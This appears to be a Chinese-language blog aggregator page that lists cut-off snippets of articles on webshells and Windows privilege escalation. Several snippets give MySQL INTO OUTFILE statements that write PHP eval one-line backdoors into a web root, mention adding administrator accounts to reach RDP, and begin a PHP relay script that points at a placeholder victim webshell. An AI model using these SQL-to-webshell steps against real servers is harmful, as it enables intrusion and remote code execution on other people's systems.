Webshell有了SYSTEM权限,却无法成功添加administrators用户,因此导致无法成功连接3389。总结原因有以下几点:I.杀软篇1,360杀毒软件2,麦咖啡杀毒软件3,卡巴斯基杀毒软件4,其他杀毒软件或防护软件II.策略篇1,3389端口变更2,莫名其妙无法添加账户3,管理员限制篇...
分类:
其他好文 时间:
2015-02-04 20:22:02
阅读次数:
209
由于学习需要最近注册了一个国外的php空间 鉴于自带php管理系统体验太差 想找一个靠谱的webshell来代替 经过几分钟的搜索 终于在网上找到了一个界面和功能都很不错的php webshell
如图:
当我想再加上自己diy的几个功能时 打开代码一看:
竟然是乱码! 于是。。心中闪过了一些邪恶的想法。。破解它!
首先 我注意到了base64_encode这个函数,于是 写了一个来讲...
分类:
Web程序 时间:
2015-01-29 09:34:37
阅读次数:
806
满足条件mysql未降权未关闭file权限gpc关闭LIMIT0,1INTOOUTFILE‘这里是路径‘LINESTERMINATEDBY‘这里是你想写的内容‘--SELECT*FROM`user`whereuser=‘root‘LIMIT0,1INTOOUTFILE‘D:/xxxxx/demo.txt‘LINESTERMINATEDBY‘demo‘;
分类:
Web程序 时间:
2015-01-26 17:29:22
阅读次数:
286
mysql3.x拿webshell先建表字段写入一句话查询导出一句话mysql>usemysqlDatabasechangedmysql>CreateTABLEdemo(sanrtextNOTNULL);QueryOK,0rowsaffected(0.00sec)mysql>InsertINTOdemo(sanr)VALUES(‘<?php@eval($_POST[pass]);?>‘);QueryOK,1rowaffected(0.00sec..
分类:
数据库 时间:
2015-01-26 17:27:26
阅读次数:
202
一、 基于PHP实现的webshell攻击
二、 不用或少用else语句
三、 单页面结构(Single-page application)
四、 让搜索引擎抓取ajax的内容
五、 CURL_MULTI_INIT()
六、 PHP strstr()函数
七、 论规范化的重要性
八、 HHVM
九、 PHP源码签名收集器
十、 协同过滤推荐算法...
分类:
Web程序 时间:
2015-01-12 17:35:43
阅读次数:
256
MySQL:DropTABLEIFEXISTStemp;//如果存在temp就删掉CreateTABLEtemp(cmdtextNOTNULL);//建立temp表,里面就一个cmd字段InsertINTOtemp(cmd)VALUES(<?phpeval($_POST[cmd]);?>);//把一句话木马插入到temp表SelectcmdfromtempintooutfileF:/wwwroot/eval.php;//查询temp表..
分类:
数据库 时间:
2014-12-24 06:30:25
阅读次数:
237
cmd Shell by:anlfi Lock is Switched Off! , The shell can be accessed by anyone! []--------------cmd Shell-----------...
分类:
Web程序 时间:
2014-12-11 06:43:47
阅读次数:
6581
声明:本文提到的技术,仅可用作网络安全加固等合法正当目的。本文作者无法鉴别判断读者阅读本文的真实目的,敬请读者在本国法律所允许范围内阅读本文,读者一旦因非法使用本文提到技术而违反国家相关的法律法规,所造成的一切不良后果由该读者独立承担,本文作者不负责也不承担任何直接间接或连带等法律责任。标有“以下为...
分类:
Web程序 时间:
2014-12-06 22:42:59
阅读次数:
262
通过本地中转可以很好地防止带后门的菜刀窃取webshell。PHP代码如下所示,原理自行思考,不懂的请留言
<?php
$webshell="http://www.victim.com/webshell.php";//把这里改成你的shell地址
$temp=$_POST;
$data = $temp;
$data = http_build_query($data);
$...
分类:
Web程序 时间:
2014-11-30 00:30:51
阅读次数:
659
在Web渗透的过程中,最为麻烦的一个环节就是上传WebShell,之前曾介绍过利用数据库备份来上传,这也属于最为简单和古老的一种方法。本文将介绍另外一种利用抓包来上传WebShell的方法,目标网站采用南方数据5.0,实验平台采用IIS搭建,如何利用IIS搭建ASP网站可参考博文http://y..
分类:
Web程序 时间:
2014-11-27 06:54:21
阅读次数:
232
